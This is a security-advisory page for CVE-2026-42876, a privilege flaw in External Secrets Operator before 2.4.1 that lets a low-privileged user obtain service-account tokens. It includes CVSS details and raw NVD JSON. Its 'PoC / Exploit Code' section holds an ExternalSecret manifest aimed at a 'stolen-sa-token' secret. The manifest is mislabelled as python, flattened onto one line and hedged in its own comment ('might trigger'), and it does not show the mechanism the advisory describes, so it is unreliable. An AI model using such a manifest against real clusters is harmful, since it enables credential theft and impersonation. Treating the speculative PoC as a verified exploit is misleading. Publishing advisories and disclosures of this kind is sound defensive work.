Security Vulnerability Report
中文
CVE-2026-42876 CVSS 4.9 MEDIUM

CVE-2026-42876

Published: 2026-05-11 20:25:44
Last Modified: 2026-05-11 20:25:44
Source: [email protected]

Description

External Secrets Operator reads information from a third-party service and automatically injects the values as Kubernetes Secrets. Prior to 2.4.1, a user who only has permission to create ExternalSecret resources can cause the operator to create a Secret that Kubernetes will automatically populate with a long-lived token for the specified service account. This effectively allows the user to impersonate any service account in the namespace without needing direct create permissions on TokenRequest or Secrets of that type. This vulnerability is fixed in 2.4.1.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

External Secrets Operator < 2.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
apiVersion: external-secrets.io/v1beta1 kind: ExternalSecret metadata: name: exploit-cve-2026-42876 namespace: default spec: # Reference to the SecretStore configured in the cluster secretStoreRef: name: example-store kind: SecretStore # Target Secret name where the token will be injected target: name: stolen-sa-token creationPolicy: Owner data: - secretKey: token remoteRef: # In a vulnerable version, this configuration might trigger # the operator to generate a token for a specified service account key: "target-service-account-token"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42876", "sourceIdentifier": "[email protected]", "published": "2026-05-11T20:25:44.307", "lastModified": "2026-05-11T20:25:44.307", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "External Secrets Operator reads information from a third-party service and automatically injects the values as Kubernetes Secrets. Prior to 2.4.1, a user who only has permission to create ExternalSecret resources can cause the operator to create a Secret that Kubernetes will automatically populate with a long-lived token for the specified service account. This effectively allows the user to impersonate any service account in the namespace without needing direct create permissions on TokenRequest or Secrets of that type. This vulnerability is fixed in 2.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://github.com/external-secrets/external-secrets/commit/4ddd240af7fe88725d9857b9a0c198073502e288", "source": "[email protected]"}, {"url": "https://github.com/external-secrets/external-secrets/releases/tag/v2.4.1", "source": "[email protected]"}, {"url": "https://github.com/external-secrets/external-secrets/security/advisories/GHSA-fq7h-9x26-6j22", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.